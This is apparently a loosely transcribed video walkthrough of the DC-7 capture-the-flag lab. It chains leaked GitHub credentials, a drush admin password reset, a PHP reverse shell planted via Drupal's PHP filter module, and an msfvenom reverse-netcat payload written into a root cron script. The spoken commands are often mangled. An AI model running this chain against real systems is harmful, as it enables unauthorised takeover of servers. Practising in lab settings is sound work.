Hello guys, welcome back to a Pentesters Club. Today we're going to solve another CTF challenge named called DC7. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network scanning, footprinting, exploration, privilege escalation, and capture the flag. That's it. So first, open the terminal. So you just type sudo su and enter the password. So you just type net discover minus I 80. So first we would like to identify the network. So we identify our targeted network. IP address is this one. So you just spit now, you just type nmap minus t4 minus a as an aggressive scan and enter your targeted IP address. So now let's wait for the nmap result. So we got it SH result. So one is we got nmap result and we got it like one is available with SH, another one is available with here with the AT with the Apache. So it's you can look like HTTP robots.txt and 22 is a disallowed. Then we can see here nothing else. So we would like to look header. So it's in Drupal CMS 8. Okay, so that's it. So file, we would like to open a new tab. So it is in the Drupal CMS. So we would like to type enter your targeted IP address 192.168.0.106. So we can see here it is in Drupal CMS. So we done before D8. Okay, so now it's D7. So what we would like to do here is D7 introduce some new concepts, but I will leave you a figure out what they are. While this challenge is not all the technical, if you need to restore to a brute force or a directory attacks, you probably won't succeed it. What you will have to do this, think outside of the box. Way outside of the box is like D7 user. So just copy this one. So D7 it's like only a user, that's it. So we would like to use GitHub Sherlock. So we would like to enumerate. So we have this one. So we would like to use the Sherlock hunt a social media. So we would like to use this Sherlock project. So just control and copy. Come back here. So you just type git clone and paste the repository. So now let's wait for this. So we just go to a Sherlock list. So we would like to first install the requirements. Now come back here. So now let's wait for this. So we need to run this setup.python first. So now you just type list again. So you just type Python 3, setup.python. So we just type install. So we get a warning here, sudo su, and enter your targeted password. So you just type Python 3, setup.python, install. So let's install this. Exit list. So now we got it Sherlock here. So you just type help. Uh, we would like to get output tar csv sites name. So then come back here. So Sherlock and username, that's it. So now we would like to utilize Sherlock. And what is the username? So our username is, we got it only here is DC7 user. So just, that's it. So just copy. So it's not an inside. So now we would like to look. So it's checking all everywhere in the network like a Twitter, Facebook, XYZ things. So it will enumerate the username where it will be have. Like a X, Twitter is modified to X. It's taking big, lengthy, long time. So we would like to look uh, by some other things. So until it will get the result. So we would like to look until this will get the result. We would like to look manually. Uh, DC7 user social platforms. So first we would like to gather from social platforms. Still it's checking. So here we got it DC7. So we would like to open this DC7. So here got in GitHub. Here we got it. It's enumerating some useful informations. So let it come. So the another one we would like to look this one. So I would like to concentrate on this one also in GitHub. So it's coming. So it's too bad of internet or yes, we got it. One is in GitHub. The same thing in the profile. You can see something went wrong. We would like to look. So it's in the same GitHub URL. So we no need to worry. So this is a DC7 user. So successfully we got it here with the help of Sherlock and analyzing by ourselves. Okay, so we just quit it. Now just come back here, cd, just type clear. So now we would like to go back to Firefox. So now we just open this, close this, and this one also. So we would like to look, have one repository here. We would like to look in this repository. It is like a staff database, and we got it in the staff database as a config.php. So we would like to look in this config.php. So we got it, the username is DC7 user and a password is something, and the database name is staff. So we would like to try to connect to an SSH. So SSH DC7 user, and enter your targeted IP address 182.168.106, and it asks yes. So it all depends on the password. Now so just copy this password, come back. So just open this mousepad, paste it, come back here, just copy, paste it. So we have successfully cracked this SSH with the outside of the box. So it's all depends on the recurrences. So easily you can crack, we are easily crack this password. So now next, what we would like to do here is, so you just type list minus al. So here I have mbox. So we would like to look in the mbox, cd m. So it's not like a directory, it's file mbox. So it's like some coding. We prefer not to understand anything else from here. Come back here. So subject, to do a cron job to get a root privilege access, there is available opt a script and back.sh. So inside the back.sh, so we would like to notice something else. So we would like to type again cat opt scripts backup.sh. Sorry, here backups.sh. So here we can see here in the backups.sh, there is an address. We need to use address of SQL dump of the results. So we would like to generate with our own username. So for that we would like to look addressed commands. So we would like to copy, come back here. So with this no use. We would like to type a drush commands. So we would like to look drush commands. So we would like to come back here. Drush. So here we can see here December 2015 migrated the drush commands from the Drupal to a Jekyll. So we would like to get a migrate, like we don't know the username and password. So for that we would like to use, so to search API to search the usernames or something. So come back here. So we would like to look another one targeted all comments of Drush. So we would like to look this. In the we need a Drupal directory for the Drush. So we need to use the manually. So we prefer not to say here anything else which one we would like to use. So it's in based on the SQL injection. So what he write, we would like to type website dot. So we would like to change the username and password here. So you just type a drush and we would like to type a user and password and admin. So I would like to change the password. We don't know the password. So as he mentioned here, okay, clearly. So I would like to use the password, or here is a passphrase. So equal password equal to, I would like to mention any name. So the command user or password needs a higher bootstrap level to run. You will need to involve a drush from the functional Drupal environment on this command. So how we would like to run in a high privilege? So we just go to cd where www.html. So we are in the HTML directory. So we would like to type this thing dress, just copy, paste it. Yeah, now we have successfully changed the password for an admin. Now what we would like to do here is, so we already know that login targeted website. So we just come back here. So here is an login. So username is admin, password is, I just enter that password is Alex. So we have successfully logged into the dashboard. Now we can see here. Yes. So now we have successfully logged into the dashboard. So now here, how we would like to exploit this one. So for this, we would like to type here in the manage. Then we would like to go to an extensions. In the list, I would like to install a new module. So to install a new module, I would like to get the new module. Like I would like to download it manually to get a PHP install here. Open a new tab. We just type here https drupal.org. Then I would like to go to a project. PHP. So we would like to look in the project PHP. So where we gonna download? So come back here. Security policies, custom themes. So where is a download page? So here as a source code. So we would like to download this. So here is a code. So we just need to download entirely of this a tar.zip. So I would like to download this. So again it's came to here. From where we would like to download. So I just need to click on this. So here is download. So we have successfully downloaded this one. Now you can see here PHP 8x. So now come back here. So we just click on browse. Now click on home or click on downloads. So you just need to open this one and click on install. So it says the website occurred unaccepted error. So we would like to go back here. So I would like to get the zip folder. I get a zip folder. Now come back here. So I would like to change the file. Then try to install. So it's not gone. So for example, name of your local computer. So it's star.gz. So we just going to install. So now I have downloaded another file is PHP 8.0, this one. So I would like to run this. So we would like to change the folder, this. Now come back. So try to install. So it was installed the PHP now. So you just enable a newly added modules. So once you click on the extend, then when you go to is this, you click on the extend, we not get here. So in the filters, so you just type PHP. So we just got a PHP filters. You just enable and install. So now what we would like to do here is, so in here we would like to look. So in the node, so otherwise we would like to go for configuration. We would like to look. So that's it. So we would like to look. So now we're gonna extend. So where we would like to add our PHP file here, but we cannot add. How we can add here? So content, we would like to look in the content. So otherwise we would like to look not in the content, otherwise we would like to look node. So we would like to look in the node. Then we just type add. So we would like to add article here. No need to add an article. We would like to, so we just add only article partial, and it is in not in PHP code, and come back here. uh, this just type exit list. You just type config. So I already have here R shell, so you just type mousepad rshell.php. So I have successfully configured the reverse.php. So you just quit now, come back here, file, and I just paste it here. then come back here, just click on save. Then I just type netcat minus lvnp 1234. So now listening this warning, so this is quite common, not fatal, it's a refused. So we just don't want to go for that, we just try to go for preview. Then either we got it the reverse shell, yes, so we have successfully got the reverse shell. So you just type id and you just type which python, you got it. So you just type python minus c import pdy span bin bash. So enter carefully bin bash. So we have successfully got it here. So we just type list minus l. So here now what we would like to do here is, now here we would like to type, so you just type list minus la opt. So we would like to look at backups.txt, backups.sh. So backups.sh. So it's have a read and write permission. So now what we would like to do here is file, new tab. So now we have seen here it have a read and write permission. So now what we would like to do here is, so now we would like to generate a payload with the MSF Venom. So MSF Venom payload in the CMD and Unix reverse netcat. So we would like to get the reverse netcat and lhost. So what is the lhost targeted IP address? IP config, sorry, IP config, sorry, IF config is 108. Copy. So enter the lhost, and L port is, I would like to set up the port is like, I would like to use 8888 and get the raw data. So it will generate the payload here. Come back here. So here it's generated the data. So now what we would like to do here is, so now we just need to copy this information, just copy, come back, open new tab, you just type echo and paste this, Control V, and you just write this payload in backup.sh. So you just type backups.sh. So we just entirely just copy this one So now we would like to go www.data. So now you just type cd opt and scripts list minus a. So in the backup, so I would like to type what else I have copied, echo and payload. So before that, I just set up netcat minus lvnp 888. Then I just type enter. So here I got the backup data here. I was written a payload. You can see here we can get a connected. Let's see. So again, if it wrong, so we would like to type anything mistake here. So just copy this one, come back. So here is also a wrong, just paste it, echo. Yes, now we have successfully connected id. We are in the root, so you just type who am I. We are in the root, you just type cd root list minus l. We got it here. So now we would like to look at the flag. So we are reading the flag finally. So you just type cat the flag.txt. So we have successfully penetrated this machine. So try it your own guys. Thank you guys for watching. Keep smiling.